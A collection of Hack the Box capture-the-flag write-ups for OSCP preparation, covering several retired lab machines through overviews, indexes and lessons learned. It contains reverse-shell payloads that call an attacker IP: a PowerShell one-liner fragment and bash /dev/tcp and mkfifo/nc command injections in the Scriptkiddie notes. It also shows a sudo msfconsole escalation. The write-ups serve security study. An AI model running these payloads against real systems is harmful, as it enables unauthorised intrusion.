([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 12 | ``` 13 | 14 | I pasted this into my shell at `http://source.cereal.htb/uploads/oops.aspx`, and got a hit! 15 | 16 | ```bash 17 | ┌──(mac㉿kali)-[~/Documents/HTB/cereal/test-www] 18 | └─$ nc -lnvp 9001 19 | listening on [any] 9001 ... 20 | connect to [10.10.14.92] from (UNKNOWN) [10.10.10.217] 55785 21 | whoami 22 | cereal\sonny 23 | PS C:\windows\system32\inetsrv> 24 | ``` 25 | 26 | ## Conclusion 27 | 28 | I'm going to leave it there with this one. Getting a proper shell was pretty much as far as I got - I did a little bit of Windows enumeration, but nothing worth writing up. 29 | 30 | I may return to this box one day - but for now I'm just proud of myself for figuring this out with relatively few hints (and a lot of late nights). Thank you Hack the Box! -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Cereal/Cereal Index.md: -------------------------------------------------------------------------------- 1 | # Cereal Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Cereal/0 - Overview|Overview]] 4 | 5 | Loot: [[Writeups/Hack the Box/Boxes/Cereal/1 - Loot|Loot]] 6 | 7 | Enumeration: [[Writeups/Hack the Box/Boxes/Cereal/5 - Enumeration|Enumeration]] 8 | 9 | Website: [[10 - cereal.htb|Website]] 10 | 11 | Source Code: [[15 - Source Code|Source Code]] 12 | 13 | Cereal Requests: [[20 - Cereal Requests|Cereal Requests]] 14 | 15 | Deserialisation: [[25 - Deserialisation|Deserialisation]] 16 | 17 | XSS: [[30 - XSS|XSS]] 18 | 19 | Exploit Chain & Revisiting XSS: [[35 - Exploit Chain|Exploit Chain]] 20 | 21 | Shell as Sonny: [[40 - Shell as sonny|Shell as sonny]] 22 | 23 | # Tags 24 | 25 | #writeup #web #xss #markdown #deserialisation #dotnet #windows -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Devel/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Devel Overview 2 | 3 | This is the ninth box in my OSCP prep series. 4 | 5 | **Box Details** 6 | 7 | |IP|OS|User-Rated Difficulty|Date Started|Date Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.5|Windows (7)|3.6|2021-06-14|2021-06-14| 10 | 11 | This was a great easy box that involved uploading a webshell to a site via an FTP directory that linked to the webroot. Privesc to system involved exploiting `SeImpersonatePrivilege` using Juicy Potato. The box took me just over 90 minutes in total, which is a nice time frame for a low-end OSCP box equivalent. 12 | 13 | --- 14 | 15 | This was my first time successfully running a potato exploit, and it feels good to have another tool under my belt! 16 | 17 | I can also feel myself getting better at windows - I'm faster, and more familiar with the tools, tricks, and file upload methods. This is all pretty basic stuff still, but I'm enjoying laying the foundations. 18 | 19 | I think although I'm getting faster, I need to be quicker taking notes. This process definitely slows me down, and I'm sure I can cut out a lot of the markdown formatting until the end when the box is finished. 20 | 21 | ## Ratings 22 | 23 | I rated both flags a 3 - foothold was extremely easy, and I would have rated it a 1, but I couldn't read either of the flags until I got SYSTEM on the box. The priv esc was slightly harder - Juicy Potato is very well documented, but getting all the steps together to execute it wasn't straightforward enough to rate it lower. 24 | 25 | Matrix Rating: 26 | 27 | ![[Pasted image 20210614132628.png]] 28 | 29 | ## Tags 30 | 31 | #oscp-prep #windows #potato #no-metasploit #web #asp #ftp -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Devel/10 - FTP.md: -------------------------------------------------------------------------------- 1 | # FTP 2 | 3 | My first port of call was checking out FTP. 4 | 5 | We can do anonymous login: 6 | 7 | ```bash 8 | ┌──(mac㉿kali)-[~/Documents/HTB/devel/ftp] 9 | └─$ ftp 10.10.10.5 10 | Connected to 10.10.10.5. 11 | 220 Microsoft FTP Service 12 | Name (10.10.10.5:mac): anonymous 13 | 331 Anonymous access allowed, send identity (e-mail name) as password. 14 | Password: 15 | 230 User logged in. 16 | Remote system type is Windows_NT. 17 | ``` 18 | 19 | If we make a file locally, we can put it: 20 | 21 | ```bash 22 | ┌──(mac㉿kali)-[~/Documents/HTB/devel] 23 | └─$ mkdir ftp 24 | ┌──(mac㉿kali)-[~/Documents/HTB/devel] 25 | └─$ echo "test" > test 26 | ┌──(mac㉿kali)-[~/Documents/HTB/devel] 27 | └─$ mv test ftp/ 28 | ``` 29 | 30 | On the FTP client: 31 | 32 | ``` 33 | ?Invalid command 34 | ftp> put test 35 | local: test remote: test 36 | 200 PORT command successful. 37 | 125 Data connection already open; Transfer starting. 38 | 226 Transfer complete. 39 | 6 bytes sent in 0.09 secs (0.0625 kB/s) 40 | ``` 41 | 42 | So we have arbitrary upload permissions. Let's check out the site to see if we can exploit this. 43 | 44 | *Note*: we don't need to be in the `ftp` directory when we launch the client - we can connect to FTP then use `lcd ftp` also. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Devel/25 - Key Lessons Learned.md: -------------------------------------------------------------------------------- 1 | # Key Lessons Learned 2 | 3 | - FTP can upload in binary mode (`ftp> binary`) which is useful when pushing `.exe` files 4 | - Use of Juicy Potato to escalate to SYSTEM, using a powershell reverse shell 5 | - Read `systeminfo` carefully - you might see an `x64` processor, but the system may actually be 32-bit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Devel/Devel Index.md: -------------------------------------------------------------------------------- 1 | # Devel Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Devel/0 - Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Devel/05 - Enumeration]] 6 | 7 | FTP: [[Writeups/Hack the Box/Boxes/Devel/10 - FTP]] 8 | 9 | Website & Uploading Shell: [[Writeups/Hack the Box/Boxes/Devel/15 - Website]] 10 | 11 | Key Lessons: [[25 - Key Lessons Learned]] -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Granny/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | This is the sixth box in my OSCP prep series. 4 | 5 | **Box Details** 6 | 7 | |IP|User-Rated Difficulty|OS|Date Started|Date Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.15|3.3|Windows|2021-06-11|2021-06-11| 10 | 11 | This box was a little frustrating for me, but highlights some good fundamental Windows skills; file upload, ASPX webshells, enumeration via `systeminfo` and Windows Exploit Suggester, and token kidnapping exploits as an alternative to the potato family of exploits. 12 | 13 | The foothold lay in a file upload via WebDAV - with a bit of trickery, you could upload and trigger an `.aspx` shell. This gave you access to the box as a Network Service; from here, the account's special `SeImpersonatePrivilege` privilege could be used to kidnap a token for the SYSTEM account and spawn a shell as SYSTEM. 14 | 15 | --- 16 | 17 | I originally started this box on the [SESH Account](https://www.hackthebox.eu/profile/451740) on 2021-05-06. I spent a good few hours getting a shell as Network Service, and got stuck from there. I tried a lot of different exploits, and eventually set the box aside. I came back to doing retired boxes after the SESH CTF and sitting my AWS CCP exam with a clearer head and gave it another go from the start. 18 | 19 | I'm not going to lie - I stuggled with this box. Sometimes it's demoralising (and worrying) to spend multiple hours on one of the easiest HTB boxes. But while my methodology could improve (and is improving) I'm happy with my persistence - I exhausted pretty much every avenue I thought of before landing on the correct exploit, and I'm glad I did. 20 | 21 | By far the most difficult part for me was finding the correct exploit for SYSTEM access - I feel like it was difficult to find without googling something quite specific, which just highlights the value of knowing *how* to search effectively. Frustratingly, after reading writeups I realised my tools did not highlight the exploit where they did for other people running similar commands. This is not a great sign for the exam, knowing that sometimes enumeration scripts may behave inconsistently, but with a little persistence you can always get there. 22 | 23 | ___ 24 | 25 | I feel like I am slowly becoming more familiar with Windows exploitation, and its various classes of privilege escalation - so far I have mostly seen kernel exploits, and the boxes I've done since Granny have involved the potato family of exploits (which I'll [[15 - Shell as Network Service#Trying Juicy Potato|touch on]] here). I've also picked up a good few skills with file transfer, building reverse shells, and enumerating the operating system. Windows boxes before this one had mostly dropped us into the box as SYSTEM, so I'm glad to have some meatier challenges. 26 | 27 | ## Tags 28 | 29 | #writeup #oscp-prep #no-metasploit #webdav #web #asp #seimpersonate #ms14070 30 | 31 | ## Ratings 32 | 33 | I rated both user and root a 3 for difficulty. The concept of the foothold wasn't super complicated, but had a couple of tricky syntax requirements and required some creative thinking with renaming files. From the network service account, there seemed like a large number of attack vectors - while the correct exploit was simple enough to execute, it was difficult to find amongst all the alternatives. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Granny/20 - Key Lessons.md: -------------------------------------------------------------------------------- 1 | # Key Lessons 2 | 3 | Here are some of the important things I learned: 4 | - Making sure to check the sub-technologies running on ports like port 80 - I overlooked WebDAV for a long time! 5 | - WebDAV as a method of file upload 6 | - Bypassing upload restrictions via file renaming 7 | - Google the windows server version followed by "privilege escalation" rather than just relying on searchsploit and exploit suggester! 8 | - Having a read of the `churrasco.exe` exploit [writeup](https://github.com/Re4son/Churrasco/blob/master/DEFCON-18-Cerrudo-Token-Kidnapping-Revenge.pdf) after the box was extremely helpful, and shed some light on how `SeImpersonatePrivilege` attacks and similar exploits actually work. I now understand much better which accounts and services are likely to be vulnerable to these privesc techniques, which will be useful going forward (even if Juicy Potato didn't work in this instance) -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Granny/Granny Index.md: -------------------------------------------------------------------------------- 1 | # Granny Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Granny/0 - Overview|Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Granny/5 - Enumeration|Enumeration]] 6 | 7 | Website: [[Writeups/Hack the Box/Boxes/Granny/10 - Website|Website]] 8 | 9 | Shell as Network Service -> Root: [[15 - Shell as Network Service|Shell as Network Service]] 10 | 11 | Key Lessons from the Box: [[Writeups/Hack the Box/Boxes/Granny/20 - Key Lessons|Key Lessons]] -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Jerry/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | This is the fourth box in my OSCP prep series. 4 | 5 | **Box Details** 6 | 7 | |IP|User-Rated Difficulty|OS|Date Started|Date Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.95|2.9|Windows|2021-05-04|2021-05-04| 10 | 11 | --- 12 | 13 | This box was pretty easy. It involved logging into a Tomcat Manager page and uploading a `.WAR` shell, which gave us `system` access. 14 | 15 | It took me about two hours, which is pretty slow compared to the six minutes for first blood. However, that was mostly because I spent a fair amount of time down a rabbit hole trying to exploit a CVE. When I found the correct path through the management console, it took me about half an hour; the exploit itself dropped me in directly as `system`. 16 | 17 | ## Ratings 18 | 19 | I rated both user and root a 1 for difficulty. The exploit was arguably even simpler than Blue and Legacy, at least by hand - while it wasn't a case of just firing off a metasploit module, uploading a shell and triggering it by simply visiting the URL is much simpler than manually editing an exploit. There was also no privesc involved. 20 | 21 | # Tags 22 | 23 | #writeup #oscp-prep #windows #file-upload #tomcat #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Jerry/15 - Key Lessons.md: -------------------------------------------------------------------------------- 1 | # Key Lessons 2 | 3 | Here are some of the key lessons I learned on this box: 4 | - When faced with a login screen to a well-known service, always try guessing common/default credentials first! 5 | - Read the full details of an exploit's corresponding CVE to check it is aimed at the correct operating system, before you spend time debugging it -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Jerry/Jerry Index.md: -------------------------------------------------------------------------------- 1 | # Jerry Index 2 | Overview: [[Writeups/Hack the Box/Boxes/Jerry/0 - Overview|Overview]] 3 | 4 | Enumeration: [[Writeups/Hack the Box/Boxes/Jerry/5 - Enumeration|Enumeration]] 5 | 6 | Tomcat Exploit: [[Writeups/Hack the Box/Boxes/Jerry/10 - Tomcat|Tomcat]] 7 | 8 | Key Lessons: [[Writeups/Hack the Box/Boxes/Jerry/15 - Key Lessons]] 9 | 10 | # Tags 11 | 12 | #writeup #oscp-prep #windows #file-upload #tomcat #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Lame/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | This is the third box in my OSCP prep series. 4 | 5 | **Box Details** 6 | 7 | |IP|User-Rated Difficulty|OS|Date Started|Date Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.3|2.6|Linux|2021-05-03|2021-05-03| 10 | 11 | --- 12 | 13 | This box was also very simple, again only made harder by manual exploitation. It involved exploiting a CVE in SMB that allows command injection via the username field. 14 | 15 | Unlike Legacy and Blue there were a couple of different services to look at. As I looked at FTP first, it took me a little longer to root as I spent some time trying to get that exploit working. Overall the box took me about 2 hours, but I learnt two exploits along the way. 16 | 17 | ## Ratings 18 | 19 | I rated both user and root a 2 for difficulty, as there was a little more to them than just firing off metasploit at a single service, and the manual exploitation had a few different paths. 20 | 21 | # Tags 22 | 23 | #writeup #oscp-prep #unix #cve #smb #ftp #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Lame/Lame Index.md: -------------------------------------------------------------------------------- 1 | # Lame Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Lame/0 - Overview|Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Lame/5 - Enumeration|Enumeration]] 6 | 7 | FTP Attempted Exploit: [[10 - FTP|FTP]] 8 | 9 | SMB Successful Exploit: [[Writeups/Hack the Box/Boxes/Lame/15 - SMB|SMB]] 10 | 11 | # Tags 12 | 13 | #writeup #oscp-prep #unix #cve #smb #ftp #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Legacy/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | This is the second box in my OSCP prep series. 4 | 5 | **Box Details** 6 | 7 | |IP|User-Rated Difficulty|OS|Date Started|Date Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.4|2.5|Windows (XP)|2021-05-02|2021-05-02| 10 | 11 | --- 12 | 13 | This box was also super simple. It involved exploiting Eternal Blue on an old Windows XP machine. The only difference between it and [[Blue Index|Blue]] was the operating system and SMB username. I had rooted it within 40 minutes, and a good chunk of that time was spent documenting the process. 14 | 15 | ## Ratings 16 | 17 | I rated both user and root a 1 for difficulty. The exploit was incredibly simple, and there was no privesc involved. 18 | 19 | # Tags 20 | 21 | #writeup #oscp-prep #windows #cve #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Legacy/15 - Key Lessons.md: -------------------------------------------------------------------------------- 1 | # Key Lessons 2 | 3 | Here are some of the key things I learned on this box: 4 | - Modifying Eternal Blue to use blank usernames when connecting to SMB 5 | - Using Eternal Blue against Windows XP machines -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Legacy/Legacy Index.md: -------------------------------------------------------------------------------- 1 | # Legacy Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Legacy/0 - Overview|Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Legacy/5 - Enumeration|Enumeration]] 6 | 7 | Eternal Blue Exploit to Root: [[Writeups/Hack the Box/Boxes/Legacy/10 - Eternal Blue|Eternal Blue]] 8 | 9 | # Tags 10 | 11 | #writeup #oscp-prep #windows #cve #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Optimum/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Optimum Overview 2 | 3 | This is the seventh box in my OSCP prep series. 4 | 5 | **Box Details** 6 | 7 | |IP|Operating System|User-Rated Difficulty|Date Started|Date User Completed|Date System Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.8|Windows|3.4|2021-06-13|2021-06-13| 10 | 11 | --- 12 | 13 | This box was a little more involved than some previous Windows boxes, and required a bit of playing around with exploits till I found a working one. Still, it was pretty simple. It just involved finding a code execution vulnerability in the HFS server that was running on the box. This got us a shell as the `kostas` user. From here we could exploit ms16-032 to get a shell as `SYSTEM`. 14 | 15 | ## Ratings 16 | 17 | I rated the user stage a 2 for difficulty. It took me about 40 minutes, and most of that was finding the correct exploit out of a large number of potential ones. I rated the final part the same difficulty - finding the correct exploit was fairly simple, but my main issue was getting it onto the box and finding the syntax to execute it. This took me a couple of hours, which is slow going - but I'm getting faster. 18 | 19 | Matrix Rating: 20 | 21 | ![[Pasted image 20210613134842.png]] 22 | 23 | ## Tags 24 | 25 | #oscp-prep #no-metasploit #windows #web #hfs #kernel-exploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Optimum/20 - Key Lessons.md: -------------------------------------------------------------------------------- 1 | # Key Lessons 2 | Here are some of the key things I learned from this box: 3 | - Try every tool! There may be multiple exploits available - go for the most recent one first, and don't give up if one doesn't work 4 | - You can use `wget` as an alternative download method when powershell is being fiddly 5 | - Bear in mind what *kind* of shell you're in - it may be powershell, not command prompt, which will change the syntax of the commands you're running -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Optimum/Optimum Index.md: -------------------------------------------------------------------------------- 1 | # Optimum Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Optimum/0 - Overview|Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Optimum/05 - Enumeration|Enumeration]] 6 | 7 | Website: [[Writeups/Hack the Box/Boxes/Optimum/10 - Website|Website]] 8 | 9 | Shell as kostas -> System: [[15 - Shell as kostas|Shell as kostas]] 10 | 11 | Key Lessons: [[Writeups/Hack the Box/Boxes/Optimum/20 - Key Lessons]] -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Scriptkiddie/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | **Box Details** 4 | 5 | |IP|OS|User-Rated Difficulty|Date Started|Date User Completed|Date System Completed| 6 | |---|---|---|---|---| 7 | |10.10.10.226|Linux|4.0|2021-02-13|2021-02-15|2021-02-16| 8 | 9 | This was a pretty easy but really fun box based on exploiting another hacker's badly made website. The website runs a number of Linux commands in the background, one of which makes use of an outdated metasploit library. This can be used to execute commands on the box as the `kid` user by uploading a malicious APK file. From the kid user, we can escalate to the `pwn` user by exploiting a command injection vulnerability in a logging script designed to 'hack back' other hackers. Finally, root involves exploiting `sudo` permissions on the `msfconsole` binary to gain a shell. 10 | 11 | --- 12 | 13 | I loved this box, and how meta it was. Every part of the path felt super on-theme and it was really enjoyable. It was one of those boxes where everything running on the box felt like it had a reason to be there, and wasn't just plopped onto it for the sake of having a CTF. 14 | 15 | As with other writeups, this may contain screenshots dated from after the box retired. That's because I didn't use Obsidian when i did this box originally, and I went back and recaptured screenshots for this writeup. 16 | 17 | I came back to this box to do the writeup after watching a couple of other videos and writeups on it, and found some nice alternative ways to do what I did originally. Revisiting the box really helped me analyse and be critical of my methodology the first time round, and I actually managed to pop a shell today using a certain method when I couldn't a few months ago. 18 | 19 | --- 20 | 21 | This writeup is also available on my site at [mac-goodwin.com](https://www.mac-goodwin.com/blog/htb/2021/06/13/htb-scriptkiddie.html) 22 | 23 | ## Ratings 24 | 25 | I rated user a 3 for difficulty, and root a 4. The exploits weren't super complicated, just a little fiddly, especially when trying to return a shell. The initial APK exploit was really cool, and something I'd never heard of before. Enumeration was all pretty simple, and the final step to root was also easy. The meat of the box was the initial foothold and the escalation to `pwn`, so I'm sort of happy with the final step being simple. 26 | 27 | ## Tags 28 | 29 | #writeup #web #cve #command-injection #linux -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Scriptkiddie/25 - Shell as pwn to Root.md: -------------------------------------------------------------------------------- 1 | # Shell as pwn -> Root 2 | 3 | The first things I checked were my groups and sudo permissions: 4 | 5 | ```bash 6 | pwn@scriptkiddie:~$ id 7 | id 8 | uid=1001(pwn) gid=1001(pwn) groups=1001(pwn) 9 | pwn@scriptkiddie:~$ sudo -l 10 | sudo -l 11 | Matching Defaults entries for pwn on scriptkiddie: 12 | env_reset, mail_badpass, 13 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 14 | 15 | User pwn may run the following commands on scriptkiddie: 16 | (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole 17 | ``` 18 | 19 | What do you know? In very on-brand fashion, we can run metasploit as root! 20 | 21 | We *could* use this to run the apk exploit as root, but that's no fun - we've already used it twice. 22 | 23 | Instead, we can use metasploit's in built shell to run commands. I ran `sudo msfconsole -q` (`-q` flag being optional) and then just typed `/bin/bash` to get a root shell :) 24 | 25 | ![[Pasted image 20210612161953.png]] 26 | 27 | That's the box! 28 | 29 | ## Notes on Alternative Methods 30 | 31 | An easier way of 'bypassing' the `cut` command (courtesy of ippsec) was just to match the correct format of the log file, by inserting two rows of arbitrary data before the command: 32 | 33 | ```bash 34 | kid@scriptkiddie:~/logs$ echo 'whatever whatever ;/bin/bash -c "bash -i >& /dev/tcp/10.10.16.211/9001 0>&1"' >> hackers 35 | ``` 36 | 37 | This gives us another unstable shell that immediately dies: 38 | 39 | ![[Pasted image 20210612163258.png]] 40 | 41 | A nice alternative payload (courtesy of a colleague) would have been: 42 | 43 | ```bash 44 | kid@scriptkiddie:~/logs$ echo 'whatever whatever ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.211 9001 >/tmp/f' >> hackers 45 | ``` 46 | 47 | This gives us a shell that doesn't immediately die - but it doesn't send any commands either. 48 | 49 | ![[Pasted image 20210612163616.png]] 50 | 51 | ![[Pasted image 20210612163639.png]] 52 | 53 | I'd be interested to see if there was a good way to get a stable shell this way. I'd also be interested to see if there was a good way of exploiting the command injection in the `searchsploit` field that partially worked early on, but I couldn't get it to work myself. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Scriptkiddie/Scriptkiddie Index.md: -------------------------------------------------------------------------------- 1 | # Scriptkiddie Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Scriptkiddie/0 - Overview|Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Scriptkiddie/5 - Enumeration|Enumeration]] 6 | 7 | Website: [[Writeups/Hack the Box/Boxes/Scriptkiddie/10 - Website|Website]] 8 | 9 | Exploiting Metasploit CVE: [[15 - Metasploit CVE|Metasploit CVE]] 10 | 11 | Shell as kid: [[20 - Shell as kid|Shell as kid]] 12 | 13 | Shell as pwn -> root: [[25 - Shell as pwn to Root|Shell as pwn]] 14 | 15 | ## Tags 16 | 17 | #writeup #web #cve #command-injection #linux -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Shocker/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Shocker Overview 2 | 3 | This is the eighth box in my OSCP prep series. It was also one of the boxes for Hack the Box's #takeiteasy dare challenge. 4 | 5 | **Box Details** 6 | 7 | |IP|OS|User-Rated Difficulty|Date Started|Date Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.56|Linux|3.6|2021-06-14|2021-06-14| 10 | 11 | --- 12 | 13 | This box had a straightforward expoit, but with some tricky enumeration. The initial foothold was provided via Shellshock, a common vulnerability in scripts that set environment variables. But due to a strange configuration in the server, finding the appropriate shellshockable file required you to use the exact combination of tools and wordlists, which took a while. Root access was more simple, and just involved a GTFOBin on perl. 14 | 15 | ## Ratings 16 | 17 | I rated user a 3 - it took me about two hours to enumerate and find the Shellshock vulnerability, but only 20 minutes once I did. A lot of that time was documenting what I was doing - this is fine when I'm learning, but I need to be quicker on the exam. 18 | 19 | I rated root a 2 - it was very simple, and only took me 20 minutes once I had a user shell. 20 | 21 | Here is my matrix rating, which is quite high on all aspects: 22 | 23 | ![[Pasted image 20210614105519.png]] 24 | 25 | Shellshock is widely exploited (or was for a long time), the foothold was just a CVE, and the box required a good amount of enumeration to find the vulnerable file. A good box overall! 26 | 27 | ## Tags 28 | 29 | #oscp-prep #linux #no-metasploit #web #shellshock #perl #sudo #takeiteasy -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Shocker/10 - OpenSSH.md: -------------------------------------------------------------------------------- 1 | # OpenSSH 2 | 3 | I ran `searchsploit` against openssh (this was after spending some time enumerating the website and getting nowhere, which I'll detail in the next section): 4 | 5 | ```bash 6 | ┌──(mac㉿kali)-[~/Documents/HTB/shocker] 7 | └─$ searchsploit openssh 8 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- 9 | Exploit Title | Path 10 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- 11 | 12 | OpenSSH 7.2 - Denial of Service | linux/dos/40888.py 13 | OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | multiple/remote/39569.py 14 | OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py 15 | 16 | OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt 17 | OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt 18 | OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py 19 | ``` 20 | 21 | The most promising exploit, `multiple/remote/39569.py`, requires authentication. 22 | 23 | I even tried logging in with no username/key just in case there was some weird SSH misconfiguration: 24 | 25 | ```bash 26 | ┌──(mac㉿kali)-[~/Documents/HTB/shocker] 27 | └─$ ssh -p 2222 10.10.10.56 28 | The authenticity of host '[10.10.10.56]:2222 ([10.10.10.56]:2222)' can't be established. 29 | ECDSA key fingerprint is SHA256:6Xub2G5qowxZGyUBvUK4Y0prznGD5J2UyeMhJSdCZGw. 30 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 31 | Warning: Permanently added '[10.10.10.56]:2222' (ECDSA) to the list of known hosts. 32 | mac@10.10.10.56's password: 33 | Permission denied, please try again. 34 | mac@10.10.10.56's password: 35 | Permission denied, please try again. 36 | mac@10.10.10.56's password: 37 | ``` 38 | 39 | But no luck. It was worth doing our due diligence here, but SSH likely isn't vulnerable. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Shocker/25 - Key Lessons.md: -------------------------------------------------------------------------------- 1 | # Key Lessons 2 | 3 | - `gobuster` does not automatically check for directories! This isn't an issue on most webservers, as often `/cgi-bin` will redirect to `/cgi-bin/`, but if not you must use the `-f` flag or another tool such as `dirsearch` 4 | - Shellshockable file extensions include `.cgi`, `.sh`, and `.txt` -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Shocker/Shocker Index.md: -------------------------------------------------------------------------------- 1 | # Shocker Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Shocker/0 - Overview|Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Shocker/05 - Enumeration|Enumeration]] 6 | 7 | Briefly enumerating OpenSSH: [[10 - OpenSSH|OpenSSH]] 8 | 9 | Enumerating webserver, finding and exploiting shellshock: [[15 - Website|Website]] 10 | 11 | Shell as shelly to Root: [[20 - Shell as shelly|Shell as shelly]] 12 | 13 | Key Lessons: [[25 - Key Lessons]] -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Writeup/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | This was the second box I did from the Hack the Box Take it Easy Dare Challenge. 4 | 5 | **Box Details** 6 | 7 | |IP|OS|User-Rated Difficulty|Date Started|Date Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.138|Linux|4.4|2021-07-15|2021-07-15| 10 | 11 | This box started with a bit of digging around a blog for something exploitable - unfortunately there was a WAF (Web Application Firewall) preventing brute forcing and fuzzing, so it was back to basics. Eventually I found a version number for a CMS which had an SQL Injection vulnerability, allowing us to extract a password hash and log in to the box. 12 | 13 | The privesc to root involved exploiting a Message of the Day script that called a binary without an absolute path - the `/usr/local/sbin` directory on the box was writeable, which meant we could hijack the binary by writing a file with the same name at that location on the path. 14 | 15 | ## Ratings 16 | 17 | I rated the user flag a 2 for difficulty. I spent a long time enumerating it, but realistically I would have found it much easier if I'd paid a bit more attention to the source code. Once I spotted the framework, I'd shelled it within 20 minutes. The box was made a little harder to fuzz by the WAF, but scanning wasn't actually necessary for the user flag. 18 | 19 | Root was slightly trickier, and involved a bit of SUID trickery to get a shell. It was also a little tricky to find the target binary and the right syntax, but the exploit concept wasn't too hard. It took 45 minutes to read the flag itself, then another 10-15 minutes to figure out how to get a root shell. 20 | 21 | ## Tags 22 | 23 | #linux #no-metasploit #web #cve #cron #pspy #motd #takeiteasy -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Writeup/20 - Key Lessons.md: -------------------------------------------------------------------------------- 1 | # Key Lessons 2 | 3 | - I got to practice hijacking non-absolute paths in cron jobs 4 | - I also learned the trick about copying `/bin/bash` to a new file and applying `u+s` permissions to get a shell -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Writeup/Writeup Index.md: -------------------------------------------------------------------------------- 1 | # Writeup Index 2 | Overview: [[Writeups/Hack the Box/Boxes/Writeup/00 - Overview]] 3 | 4 | Enumeration: [[Writeups/Hack the Box/Boxes/Writeup/05 - Enumeration]] 5 | 6 | Site + Shell as jkr: [[Writeups/Hack the Box/Boxes/Writeup/10 - Website]] 7 | 8 | Shell as jkr -> Root: [[15 - Shell as jkr]] 9 | 10 | Key Lessons: [[Writeups/Hack the Box/Boxes/Writeup/20 - Key Lessons]] --------------------------------------------------------------------------------